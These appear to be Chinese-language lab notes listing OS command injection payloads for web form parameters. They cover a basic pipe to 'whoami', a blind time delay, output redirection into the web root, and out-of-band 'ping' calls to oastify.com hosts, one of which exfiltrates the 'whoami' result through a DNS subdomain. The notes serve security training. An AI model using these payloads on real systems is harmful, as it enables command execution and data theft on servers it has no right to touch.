操作系统命令注入,简单案例


productId=3&storeId=2+|+whoami

具有时间延迟的盲操作系统命令注入

csrf=6MTK8ezPHaRvkb0SrUGDYuzvGsMIPlBT&name=1&email=|sleep+10|&subject=1&message=1

带输出重定向的盲操作系统命令注入

csrf=0RQvmPNElav5S2TjfXdN8AOIlFL7Rdb9&name=1&email=|whoami>>/var/www/images/output.txt|&subject=1&message=1



带外交互的盲操作系统命令注入


csrf=u3WKiY9ANqJGps5Sx4qbt4N2w1bHjQ24&name=1&email=|ping+m8vxmbxifw9lbikzy0wd52nmyd44sugj.oastify.com|&subject=1&message=1

带外数据渗漏的盲目操作系统命令注入


csrf=zFQDrjDaYRKIi4e25nqDp5fGJ7bFESpo&name=1&email=|ping+`whoami`.mndx1bciuwolqizzd0bdk22mddj47vvk.oastify.com|&subject=1&message=1
